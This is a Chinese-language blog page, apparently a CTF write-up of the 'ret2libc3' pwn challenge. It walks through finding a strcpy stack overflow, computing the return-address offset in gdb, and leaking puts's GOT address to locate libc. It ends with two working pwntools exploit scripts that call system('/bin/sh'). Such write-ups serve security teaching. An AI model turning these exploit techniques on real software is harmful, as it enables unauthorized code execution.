onedaybook
  • 关于这个博客
  • C2工具原理分析
    • C2工具原理分析:从生成shellcode到上线CS服务器全过程
  • DevilC2工具开发
    • 关于这个项目
  • Rootkit工具开发
  • EvilLoader工具开发
  • 免杀
    • 问鼎免杀之路
      • 序言
      • 第一章-基础
        • 0-基础
        • 1-PE的相关数据结构
        • 2-WindowsAPI
        • 3-混淆加密
        • 4-特征修改
        • 5-分离
        • 6-转换
        • 7-保护
      • 第二章-执行与注入技术
        • 0-创建线程注入(CreateThread Injection)
        • 1-创建纤程注入(CreateFiber Injection)
        • 2-创建远程线程注入(CreateRemoteThread Injection)
        • 3-创建堆注入(HeapCreate Injection)
        • 4-创建线程池注入(CreateThreadpoolWait Injection)
        • 5-进程镂空注入(Process Hollowing Injection)
        • 6-DLL镂空注入(DLL Hollowing Injection)
        • 7-DLL劫持注入(涉及白加黑)
        • 8-映射注入(Mapping Injection)
        • 9-MapViewOfFile+NtMapViewOfSection
        • 10-挂钩注入(SetWindowsHookEx Injection)
        • 11-注册表注入
        • 12-设置上下文劫持注入(SetContext Hijack Injection)
        • 13-剪贴板注入(Clipboard Injection)
        • 14-突破session 0远程线程注入
        • 15-枚举RWX区域注入
        • 16-APC注入(APC Injection)
        • 17-APC & NtTestAlert Injection
        • 18-APC劫持
        • 19-Early Bird
        • 20-基于资源节加载shellcode
        • 21-内核回调表注入(KernelCallbackTable Injection)
        • 22-自举的代码幽灵——反射DLL注入(Reflective DLL Injection)
        • 23-内存申请总结
        • 24-移动或复制shellcode总结
        • 25-shellcode执行总结
      • 第三章-防御规避
        • 0-动态获取API函数(又称隐藏IAT)
        • 1-重写ring3 API函数
        • 2-自定义 String 哈希算法
      • 第四章-武器化
        • 0-Windows Shellcode开发
        • 1-Windows Shellcode开发(x86 stager)
        • 2-Windows Shellcode开发(x64 stager)
        • 3-Linux Shellcode开发(Stager & Reverse Shell)
        • 4-非PEB获取ntdll和kernel32模块基址的精妙之道
        • 5-从SRDI原理剖析再到PE2Shellcode的实现
      • 第五章-主动进攻
      • 第六章-社工钓鱼
    • 随笔
      • 0-用哥斯拉插件零基础免杀上线msf和cs
      • 1-新版RDI
      • 2-新新版RDI
  • 权限提升
  • 数字取证/应急响应
  • 工具二开
    • 哥斯拉二开
      • 环境准备
  • 代码审计
  • PWN
    • ret2text
    • ret2shellcode
    • ret2syscall
    • ret2libc1
    • ret2libc2
    • ret2libc3
Powered by GitBook
On this page
  1. PWN

ret2libc3

Previousret2libc2

1、查看结构和保护措施

使用checksec <文件>查了架构和保护措施

几个方向:

没有PIE:ret2text,retsyscall,retshellcode,ret2libc

开启了NX:ret2libc,ret2syscall(静态链接),ret2shellcode(存在全局变量)

使用file <文件>查看链接方式

该文件属于动态链接

2、确定方向

  • 没有发现后门函数,没有system函数(没有plt表项)

  • 按Shift+F12,来到文件的全部字符串界面,没有发现可以作为参数的“/bin/sh”字符串

  • 观察main函数,发现没有泄露局部变量src地址的函数,所以我们不能将src作为参数传递给gets函数,然后得到bin/sh的地址(应该是能泄露的,只是需要write函数,并且有点麻烦,不如泄露了libc的地址后,直接用libc文件的/bin/sh)

  • 来到全局文本指令界面,然后去看bss段有没有全局变量,最后发现了全局变量buf2(没有开启PIE,则程序固有的text,data,bss段的地址不会变化)

  • 继续观察main函数,发现了一个泄露地址的几个语句:

    • read(0,buf,0xAu) //0代表标准输入,buf表示写入数据的变量,0xA表示写入10个字节的变量(没有溢出),u表示无符号数据

    • strtol(buf,v4,v5) //buf表示从该变量中取出数据,然后将字符串转换成对应的ASCLL码值,然后复制给了v8

    • See_something(v8)//将v8(地址)里的内容输出

  • 寻找libc文件的库函数,发现了read、puts、printf、strpy、libc_start_main、strol函数

观察程序执行流,发现再栈溢出之前,执行了puts,printf、read等库函数,他们在got段中已经生成了got表项,我们就决定泄露puts函数的got表项地址

  • 结合前面已经收集到的信息:开启了NX保护+动态链接+没有system的plt表项+没有发现可以作为参数的“/bin/sh”字符串+没有gets函数的plt表项+没有发现全局变量buf2+发现了泄露地址的语句,所以这个是ret2libc3

3、整体思路

  • 我们可以将一个已有的libc文件的函数的got地址给read函数,在经过strol转成相应的ASCII值,最后用printf函数将got地址的内容输出(输出的内容是字符串)

  • 已知库函数的实际地址,又知道库函数在libc的偏移地址,则可以求libc的基址

基址 = 实际地址-偏移量

libcbase = 实际地址-elf.symbols['库函数名']

  • 有了基址,我们就可以使用libc文件的所有内容,这其中包括system函数和'/bin/sh'

4、寻找危险函数

  • 在main函数的汇编界面,按F5反编译成C语言代码

  • 分析main函数的主逻辑

    • puts函数不存在漏洞

    • printf不存在漏洞

    • fflush函数是关闭缓冲区,不存在漏洞

    • 第一个read函数向buf写入10个字节的数据,没有溢出

    • 第二个read函数向src写入256个字节的数据,没有溢出

    • Print_message函数,它调用了strcpy,将src的内容复制到dest,但是dest能56个字节的数据,而src有256个字节的数据,复制时会发生溢出!

5、计算偏移量

  • IDA静态分析得出:dest到ret_addr的距离为0x38+0x4=0x3c

  • gdb 动态调试

①gdb <文件>

②因为在程序运行时,是一定会停在read函数处,让你输入地址。在这个环节中,我们只需要计算偏移量,所以就随便的在IDA中复制一个地址0x080483F0(当面对较复杂时,在我们想要的位置上打断点,具体会在ret2libc3介绍)

strol是将字符串转换成对应的ASCII值,但是不能出来16进制的字符串数字,要转成10进值,(0x080483F0)=(134513648)

地址里面的内容是:0xa01c25ff(不用复制,因为远端服务器开启了ASLR,我们会在脚本中用elf对象获取当前的地址里的内容,总结的时候会详细说明elf对象的好处)

③一直步过到“Print_message”,我们需要进入到Print_message函数的内部,输入si进入函数内部

④一直步过到“strcpy函数”,我们不需要进入到strcpy函数的内部(规律:凡是库函数都不需要进入函数内部)

⑤执行stack <数字>查看任意多行的栈空间的情况

观察’aaaa‘数据最后存放在0xffffd050的位置上,这就是dest的地址,返回地址就是ebp的下一单元

⑥计算dest到ret_addr的偏移量

dest的地址:0xffffd050

ret_addr:0xffffd08c(其实gdb已经告诉我们这个地址里的内容就是main函数下一条指令:mov ptr [esp],0x80487d5 的地址)

使用gdb自带的计算距离的指令:distance <地址1> <地址2>

distance 0xffffd050 0xffffd08c

偏移量为:0x3c

求本地的libc地址

ldd <文件> 查看文件链接的本地libc的软连接:/lib/i386-linux-gnu/libc.so.6

六、编写exp

exp1

from pwn import *

elf = ELF('./ret2libc3')

libc = ELF('/lib/i386-linux-gnu/libc.so.6')

io = process('./ret2libc3')

puts_got = elf.got['puts']

io.recvuntil(b' :',str(puts_got))

libcbase = int(io.recvuntil('\n',drop=True),16)-libc.symbols['puts']

system_addr = libcbase + libc.symbols['system']

bin_sh = libcbase + next(libc.search(b'/bin/sh'))

payload = flat([b'A'*0x3c,system_addr,b'AAAA',bin_sh])

io.recvuntil('Leave some message for me :')

io.sendline(payload)

io.recv

io.interactive()

exp2

from pwn import *

io = process('./ret2libc3')

elf = ELF('./ret2libc3')

libc = ELF('/lib/i386-linux-gnu/libc.so.6')

io.sendlineafter(b' :',str(elf.got['puts']))

io.recvuntil(b'The content of the address : ')

libcBase=int(io.recvuntil('\n',drop=True),16) - libc.symbols['puts']

payload = flat([b'A'*0x3c,libcBase+libc.symbols['system'],'aaaa',libcBase+next(libc.search(b'/bin/sh'))])

#payload = flat([b'A'*0x3c,libcBase+libc.symbols['system'],'aaaa',next(elf.search(b'sh\x00'))])

io.recvuntil('Leave some message for me :')

io.sendline(payload)

io.recv()

io.interactive()